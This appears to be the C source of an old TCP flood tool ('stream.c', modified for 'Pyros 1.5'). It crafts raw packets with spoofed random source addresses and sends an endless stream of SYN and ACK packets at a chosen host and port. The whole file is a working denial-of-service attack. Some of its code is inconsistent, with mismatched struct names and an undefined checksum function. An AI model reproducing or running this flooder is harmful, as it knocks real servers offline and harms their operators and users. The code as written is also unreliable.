/*
* Atrix Team 1994, 2001 - http://www.atrix.cjb.net
* Original Code by Packet Storm
* Modified by SeCToR-X 03/01/2001
*
* File modified for Pyros 1.5
*/

#ifndef __USE_BSD
#define __USE_BSD
#endif
#ifndef __FAVOR_BSD
#define __FAVOR_BSD
#endif

#ifdef LINUX
#define SFIX(x)  htons(x)
#else
#define SFIX(x)  (x)
#endif

struct ip_hdr {
    u_int       ip_hl:4,                /* header length in 32 bit words */
                ip_v:4;                 /* ip version */
    u_char      ip_tos;                 /* type of service */
    u_short     ip_len;                 /* total packet length */
    u_short     ip_id;                  /* identification */
    u_short     ip_off;                 /* fragment offset */
    u_char      ip_ttl;                 /* time to live */
    u_char      ip_p;                   /* protocol */
    u_short     ip_sum;                 /* ip checksum */
    u_long      saddr, daddr;           /* source and dest address */
};

struct tcp_hdr1 {
    u_short     th_sport;               /* source port */
    u_short     th_dport;               /* destination port */
    u_long      th_seq;                 /* sequence number */
    u_long      th_ack;                 /* acknowledgement number */
    u_int       th_x2:4,                /* unused */
                th_off:4;               /* data offset */
    u_char      th_flags;               /* flags field */
    u_short     th_win;                 /* window size */
    u_short     th_sum;                 /* tcp checksum */
    u_short     th_urp;                 /* urgent pointer */
};

struct tcpopt_hdr {
    u_char  type;                       /* type */
    u_char  len;                                /* length */
    u_short value;                      /* value */
};

struct pseudo_hdr {                     /* See RFC 793 Pseudo Header */
    u_long saddr, daddr;                        /* source and dest address */
    u_char mbz, ptcl;                   /* zero and protocol */
    u_short tcpl;                       /* tcp length */
};

struct packet {
    struct ip/*_hdr*/ ip;
    struct tcphdr1 tcp;
/* struct tcpopt_hdr opt; */
};

struct cksum {
    struct pseudo_hdr pseudo;
    struct tcphdr1 tcp;
};

struct packet spacket1;
struct cksum cksum;
struct sockaddr_in s_in;
u_short dstport, pktsize, pps;
u_long sdstaddr;
int sock;

u_long lookup(char *hostname)
{
    struct hostent *hp;

    if ((hp = gethostbyname(hostname)) == NULL) {
       fprintf(stderr, "Could not resolve %s.\n", hostname);
       exit(1);
    }

    return *(u_long *)hp->h_addr;
}


void flooder(void)
{
    struct timespec ts;
    int i;


    memset(&spacket1, 0, sizeof(spacket1));

    ts.tv_sec                   = 0;
    ts.tv_nsec                  = 10;

    spacket1.ip.ip_hl             = 5;
    spacket1.ip.ip_v              = 4;
    spacket1.ip.ip_p              = IPPROTO_TCP;
    spacket1.ip.ip_tos            = 0x08;
    spacket1.ip.ip_id             = rand();
    spacket1.ip.ip_len            = SFIX(sizeof(spacket1));
    spacket1.ip.ip_off            = 0; /* IP_DF? */
    spacket1.ip.ip_ttl            = 255;
    spacket1.ip.ip_dst.s_addr     = random();

    spacket1.tcp.th_flags         = 0;
    spacket1.tcp.th_win           = htons(16384);
    spacket1.tcp.th_seq           = random();
    spacket1.tcp.th_ack           = 0;
    spacket1.tcp.th_off           = 5; /* 5 */
    spacket1.tcp.th_urp           = 0;
    spacket1.tcp.th_dport         = dstport?htons(dstport):rand();

/*
    spacket1.opt.type             = 0x02;
    spacket1.opt.len              = 0x04;
    spacket1.opt.value            = htons(1460);
*/


    cksum.pseudo.daddr          = sdstaddr;
    cksum.pseudo.mbz            = 0;
    cksum.pseudo.ptcl           = IPPROTO_TCP;
    cksum.pseudo.tcpl           = htons(sizeof(struct tcphdr1));

    s_in.sin_family             = AF_INET;
    s_in.sin_addr.s_addr                = sdstaddr;
    s_in.sin_port               = spacket1.tcp.th_dport;

    for(i=0;;++i) {
/* 
        patched by 3APA3A to send 1 syn packet + 1023 ACK packets. 

*/
    if( !(i&0x3FF) ) {
        spacket1.tcp.th_sport = rand();
        cksum.pseudo.saddr = spacket1.ip.ip_src.s_addr = random();
        spacket1.tcp.th_flags = TH_SYN;
        spacket1.tcp.th_ack           = 0;

    }
    else {
        spacket1.tcp.th_flags = TH_ACK;
        spacket1.tcp.th_ack = rand();
    }


    /* cksum.pseudo.saddr = spacket1.ip.ip_src.s_addr = random(); */
       ++spacket1.ip.ip_id;
       /*++spacket1.tcp.th_sport*/;
       ++spacket1.tcp.th_seq;

       if (!dstport)
          s_in.sin_port = spacket1.tcp.th_dport = rand();

       spacket1.ip.ip_sum         = 0;
       spacket1.tcp.th_sum                = 0;

       cksum.tcp                        = spacket1.tcp;

       spacket1.ip.ip_sum         = in_cksum((void *)&spacket1.ip, 20);
       spacket1.tcp.th_sum                = in_cksum((void *)&cksum, sizeof(cksum));

       if (sendto(sock, &spacket1, sizeof(spacket1), 0, (struct sockaddr 
*)&s_in, sizeof(s_in)) < 0)
          perror("jess");

    }
}

int pstrean(char *targetip, int dp, int nnum)
{
    int on = 1;

    printf("stream.c v1.01 - TCP Packet Storm\n");

    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
       perror("socket");
       exit(1);
    }

    setgid(getgid()); setuid(getuid());

    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 
0) {
       perror("setsockopt");
       exit(1);
    }

    srand((time(NULL) ^ getpid()) + getppid());

    printf("\nResolving IPs..."); fflush(stdout);

    sdstaddr     = lookup(targetip);
    dstport     = dp;
    pktsize     = nnum;

    printf("Sending..."); fflush(stdout);

    flooder();

    return 0;
}

